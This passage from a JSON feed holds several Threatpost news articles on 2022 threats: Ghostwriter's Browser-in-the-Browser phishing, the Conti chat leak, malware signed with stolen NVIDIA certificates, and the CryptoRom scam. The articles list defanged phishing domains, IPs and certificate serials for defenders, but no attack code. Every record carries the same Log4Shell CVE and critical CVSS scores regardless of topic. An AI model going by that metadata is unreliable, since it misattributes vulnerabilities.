invisible \u201cBrowser-in-the-Browser\u201d (BitB) credential-phishing technique in order to continue its ongoing [exploitation](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) of the war in Ukraine.\n\nIn a Wednesday [post](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>), Google\u2019s Threat Analysis Group (TAG) said that they\u2019d already spotted BitB being used by multiple government-backed actors prior to the media turning a laser eye on BitB earlier this month. The fresh attention was triggered by a penetration tester and security researcher \u2013 who goes by the handle mr.d0x \u2013 who posted a [description](<https://mrd0x.com/browser-in-the-browser-phishing-attack/?no-cache=1>) of BitB.\n\nGhostwriter actors quickly picked up on BitB, combining it with another of the advanced persistent threat\u2019s (APT\u2019s) phishing techniques: namely, hosting credential-phishing landing pages on compromised sites.\n\n## BitB\n\nThe newly disclosed credential-phishing method of BitB takes advantage of third-party single sign-on ([SSO](<https://en.wikipedia.org/wiki/Single_sign-on>)) options embedded on websites that issue popup windows for authentication, such as \u201cSign in with Google,\u201d Facebook, Apple or Microsoft.\n\nThese days, SSO popups are a routine way to authenticate when you sign in.\n\nBut according to mr.d0x\u2019s post, completely fabricating a malicious version of a popup window is a snap: It\u2019s \u201cquite simple\u201d using basic HTML/CSS, the researcher said a few weeks ago. The concocted popups simulate a browser window within the browser, spoofing a legitimate domain and making it possible to stage convincing phishing attacks.\n\n\u201cCombine the window design with an iframe pointing to the malicious server hosting the phishing page, and [it\u2019s] basically indistinguishable,\u201d mr.d0x wrote at the time.\n\nJavaScript can make the window appear on a link, button click or page loading screen. As well, libraries \u2013 such as the popular JQuery JavaScript library \u2013 can make the window appear visually appealing.\n\n## BitB Credential Phishing on Compromised Sites\n\nIn Wednesday\u2019s post, TAG gave an example, shown below, of how Ghostwriter has taken to hosting credential phishing landing pages on compromised sites:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/31134025/Ghostwriter_BitB_example-e1648748440308.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/31134025/Ghostwriter_BitB_example-e1648748440308.jpg>)\n\nExample of hosting credential phishing landing pages on compromised sites. Source: TAG.\n\nThe BitB technique shown above entails drawing a login page that appears to be on the passport.i.ua domain, over the page hosted on the compromised site. \u201cOnce a user provides credentials in the dialog, they are posted to an attacker controlled domain,\u201d TAG researchers said.\n\nTAG has recently observed Ghostwriter credential-phishing on these domains:\n\n * login-verification[.]top\n * login-verify[.]top\n * ua-login[.]top\n * secure-ua[.]space\n * secure-ua[.]top\n\n## Other Campaigns Launched by Government-Backed Actors in China, Iran, North Korea & Russia\n\nSince early March, Ghostwriter\u2019s use of BitB is only one of a trio of cyber aggressions that TAG [has been tracking](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) with regards to Russia\u2019s invasion of Ukraine.\n\nThe use of the war as a lure in phishing and malware campaigns has continued to grow throughout the month, TAG said, with associated cyber-assaults coming in from government-backed actors from China, Iran, North Korea and Russia, as well as from various unattributed groups, according to TAG\u2019s Wednesday post.\n\nActors \u201chave used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links,\u201d TAG said.\n\n## Curious Gorge\n\nBesides Ghostwriter\u2019s BitB campaigns, TAG has spotted a group it\u2019s calling Curious Gorge that it attributes to China\u2019s PLA SSF conducting campaigns against government and military organizations in Ukraine, Russia, Kazakhstan and Mongolia.\n\n\u201cWhile this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations,\u201d TAG advised.\n\nBelow is a list of IPs used in Curious Gorge campaigns that TAG has recently observed:\n\n * 5.188.108[.]119\n * 91.216.190[.]58\n * 103.27.186[.]23\n * 114.249.31[.]171\n * 45.154.12[.]167\n\n## COLDRIVER\n\nFinally, TAG has also observed COLDRIVER \u2013 a Russia-based threat actor, sometimes referred to as Calisto \u2013 that has launched credential-phishing campaigns targeting several United States-based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.\n\nNow, however, for the first time, COLDRIVER is targeting the military of multiple Eastern European countries and a NATO Centre of Excellence, TAG reported.\n\nGoogle doesn\u2019t know how successful these campaigns have been, given that they were issued from newly created Gmail accounts to non-Google accounts. At any rate, Google hasn\u2019t see any Gmail accounts successfully compromised because of these campaigns, TAG said.\n\nRecently observed COLDRIVER credential phishing domains:\n\n * protect-link[.]online\n * drive-share[.]live\n * protection-office[.]live\n * proton-viewer[.]com\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T18:09:07", "type": "threatpost", "title": "Belarusian \u2018Ghostwriter\u2019 Actor Picks Up BitB for Ukraine-Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T18:09:07", "id": "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "href": "https://threatpost.com/belarusian-ghostwriter-actor-picks-up-bitb-for-ukraine-related-attacks/179210/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-28T21:09:30", "description": "The Russia-Ukraine cyber warzone has split the Conti ransomware gang into warring factions, leading to a Ukrainian member spilling 60,000 of the group\u2019s internal chat messages online. \n\nOn Monday, vx-underground \u2013 an internet collection of malware source code, samples and papers that\u2019s generally considered to be a benign entity \u2013 [shared](<https://twitter.com/vxunderground/status/1498060366445613056?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1498060366445613056%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2022%2F02%2F28%2Fconti_ransomware_gang_chats_leaked%2F>) on Twitter a message from a Conti member saying that \u201cThis is a friendly heads-up that the Conti gang has just lost all their sh\u2022t.\u201d \n\nThe gang has also, apparently, lost a cache of chat data: the first dump of what the poster promised would be multiple, \u201cvery interesting\u201d leaks coming from Conti\u2019s [Jabber/XMPP](<https://en.wikipedia.org/wiki/XMPP>) server.\n\n\u201cF\u2022ck the Russian government, Glory to Ukraine!\u201d the Conti member, who\u2019s reportedly believed to be Ukrainian, proclaimed. Threatpost advises caution about clicking on any links provided in social media messages: They are, after all, provided by a ransomware group and should be treated with kid gloves.\n\n> Conti ransomware group previously put out a message siding with the Russian government. \n> \n> Today a Conti member has begun leaking data with the message \"Fuck the Russian government, Glory to Ukraine!\"\n> \n> You can download the leaked Conti data here: <https://t.co/BDzHQU5mgw> [pic.twitter.com/AL7BXnihza](<https://t.co/AL7BXnihza>)\n> \n> \u2014 vx-underground (@vxunderground) [February 27, 2022](<https://twitter.com/vxunderground/status/1498060366445613056?ref_src=twsrc%5Etfw>)\n\nCisco Talos\u2019 Azim Khodjibaev [said](<https://twitter.com/AShukuhi/status/1498066223564738565?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1498066223564738565%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2022%2F02%2F28%2Fconti_ransomware_gang_chats_leaked%2F>) on Sunday verified that the dump does in fact contain conversations between affiliates, administrators and admins, rendered on [Jabber](<https://threatpost.com/attackers-can-exploit-critical-cisco-jabber-flaw-with-one-message/158942/>) instant-messaging accounts. \n\n> looks like the [#conti](<https://twitter.com/hashtag/conti?src=hash&ref_src=twsrc%5Etfw>) leaks of 2022 are indeed chat logs from jabber accounts between affiliates, administrators and admins. Rejoice CTI analysts and data scientists, it is in json form! [#busymonday](<https://twitter.com/hashtag/busymonday?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/DiyqNoymsD](<https://t.co/DiyqNoymsD>)\n> \n> \u2014 Azim Khodjibaev (@AShukuhi) [February 27, 2022](<https://twitter.com/AShukuhi/status/1498066223564738565?ref_src=twsrc%5Etfw>)\n\nThe conversations date back 13 months, from Jan. 29, 2021 to yesterday, Feb. 27 2022. \n\nThe first dump contains 339 JSON files, with each file representing a full day\u2019s log. Cybersecurity firm IntelligenceX has posted the spilled conversations [here](<https://intelx.io/?did=51fbf19b-91f5-4d2d-b4e7-504477ebe916>). Many of the messages are written in a Cyrillic-scripted language that appears, at least according to Google translate, to be Russian. \n\n## The Perhaps-Less-Than-100% Russian Conti\n\nConti, a Russia-based extortionist gang, is considered to be as ruthless as it is [sophisticated](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>): It was the first professional-grade ransomware group to weaponize Log4j2. \n\nOn Friday, Conti sided with Russia, pledging \u201cfull support\u201d for President Vladimir Putin\u2019s invasion of Ukraine.\n\n\u201cWARNING,\u201d Conti [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) on its blog, threatening to use its \u201cfull capacity\u201d to retaliate in the face of \u201cWestern warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/28150130/Conti-screenshot-e1646078556143.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/28150130/Conti-screenshot-e1646078556143.png>)\n\nConti blog pledge to support Russia\u2019s invasion of Ukraine. Source: Conti blog.\n\n## Cyberattacks Coming at and From Russia\n\nThe split-Conti story is just one of a myriad of cybersecurity headlines coming out of the siege of Ukraine. Some other events in the cyberwar that are rocking the security world:\n\n[Russia appears to deploy digital defenses after DDoS attacks](<https://therecord.media/russia-appears-to-deploy-digital-defenses-after-ddos-attacks/>)\n\n[Anonymous Declares \u2018Cyberwar\u2019 on Russia and Pledges Support for Ukraine](<https://heimdalsecurity.com/blog/anonymous-declares-cyberwar-on-russia-and-pledges-support-for-ukraine/>)\n\n[Anonymous breached the internal network of Belarusian railways](<https://securityaffairs.co/wordpress/128486/hacktivism/anonymous-breached-belarusian-railways.html?utm_source=feedly&utm_medium=rss&utm_campaign=anonymous-breached-belarusian-railways>)\n\n[Ukraine: Volunteer IT Army is going to hit tens of Russian targets from this list](<https://securityaffairs.co/wordpress/128464/cyber-warfare-2/ukraine-volunteer-it-army-targets-russia.html?utm_source=feedly&utm_medium=rss&utm_campaign=ukraine-volunteer-it-army-targets-russia>)\n\nRichard Fleeman, vice president of penetration testing ops at cybersecurity advisory services provider Coalfire, told Threatpost on Monday that collective groups such as Anonymous claim to be hacktivists, meaning they don\u2019t attack for personal gain, but rather that they seek to spread their ideology and wage cyberwarfare against those that don\u2019t align. \n\n\u201cThese kinds of activities ebb and flow based on geopolitical events or collective objectives of these groups,\u201d he said. This isn\u2019t new, but they\u2019ll likely escalate \u201camidst the global chaos to target various countries, government agencies, and corporations.\u201d\n\n\u201cThese groups thrive on sentiment and will likely continue to build momentum based on their objectives,\u201d Fleeman observed. \n\nThe muddle of war can also obscure false flag or false information campaigns that target, influence or mislead others, he said. \u201cThis can be accomplished in a variety of ways, for example, China compromising Russian technology and targeting other nations through the compromised infrastructure to hide the origins of their attacks or embedding Russian language or terms into source code of malware would aid in the hiding [of] the true origin.\u201d\n\nHe urged that situational awareness be elevated and that security teams \u201cbe vigilant, remain alert, and leverage their security mechanisms in place to identify threats and mitigate them in a fluid manner.\u201d\n\n## The Lure of War to Cyber Actors \n\nCasey Ellis, founder and CTO at crowdsourced cybersecurity provider [Bugcrowd](<https://bugcrowd.com/>), told Threatpost on Monday that the bloodless nature of cyber combat makes it tough to predict who\u2019ll enter this conflict and how. \n\n\u201cThe fact that a lot of unrelated but concerned actors have entered the conflict is unsurprising,\u201d he noted via email. \u201cAnonymous, for example, is well-known for having a principled position on topics and then acting or retaliating via the Internet.\u201d\n\nHis primary concern: \u201cthe relative difficulty of attribution in cyberattacks, as well as the possibility of incorrect attribution or even an intentional false flag operation escalating the conflict internationally.\u201d\n\nRussia will likely avoid provoking the United States \u201cuntil it\u2019s tactically or strategically advantageous for them to do so, which we all hope we can avoid,\u201d he noted. Last week, the White House denied considering [plans](<https://threatpost.com/white-house-denies-mulling-massive-cyberattacks-against-russia/178658/>) to launch massive cyberattacks against Russia in order to cut off its ability to pursue its military aggression \u2013 denials made in spite of NBC News quoting multiple sources to the contrary. \n\n\u201cHaving said that, the backdrop of conflict and the openness of the Internet provide greater than normal levels of'\u201daircover\u2019 and background noise for cybercriminals, as well as other nation-states looking to plant a false flag,\u201d Ellis said.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company [Netenrich](<https://netenrich.com/>), told Threatpost via email that it\u2019s the wild west out there: Traditional actors are using sabotage and DDoS related to military objectives, he observed, while others \u201cwill use the fog of war (quite literally) to take advantage. No one has to commit front line infantry if they want to take advantage anymore,\u201d he said.\n\nExpect a pig pile, he predicted: \u201cUsually for conflicts in that region, other non-state regional actors will engage, either due to patriotism or opportunism. Now that more nations are developing this capability, more are coming to play. And there is no better training ground for nation-state actors than playing in an active warzone.\u201d \n\nWhat does that mean for security teams in the United States and other western countries? It depends on what the West does, he said. \u201cIf we get involved militarily, then the scope of attacks will increase to those nations as well. If it is targeted sanctions, likely attacks will focus on those in the chain of enforcement.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-28T21:00:32", "type": "threatpost", "title": "Ukraine-Russia Cyber Warzone Splits Cyber Underground", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-28T21:00:32", "id": "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "href": "https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver [[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates[#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work \n<https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allow a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. \u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far -reaching consequences.\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. \u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants, image and video processing (including automated moderation), and manufacturing quality control systems, Bisson pointed out.\n\nHe suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. \u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice. Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial [report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. It\u2019s probably best known [for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T20:53:33", "description": "For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with crypto-scamming.\n\nAccording to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom\u2019s perpetrators have now improved their techniques. They\u2019re leveraging new iOS features \u2013 [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) \u2013 to get fake apps onto victims\u2019 phones without being subject to the rigorous app store approval process.\n\nSuccessful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.\n\n## What is CryptoRom?\n\nWe do silly things when we\u2019re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.\n\nPerhaps that\u2019s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that \u201cromance scams\u201d cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.\n\nCapitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers\u2019 M.O. is to begin there, then move the conversation to messaging apps.\n\n\u201cOnce the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,\u201d researchers explained.\n\nThe trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).\n\n\u201cThey move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,\u201d according to Sophos. \u201cAfter this, they will be told to buy various financial products or asked to invest in special \u2018profitable\u2019 trading events. The new friend even lends some money into the fake app, to make the victim believe they\u2019re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.\u201d\n\nThe ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app, while bringing a brother and friends into the scheme unwittingly.\n\nIn the worst case thus far, one user wrote that \u201cI have invested all my retirement money and loan money, about $1,004,000. I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent 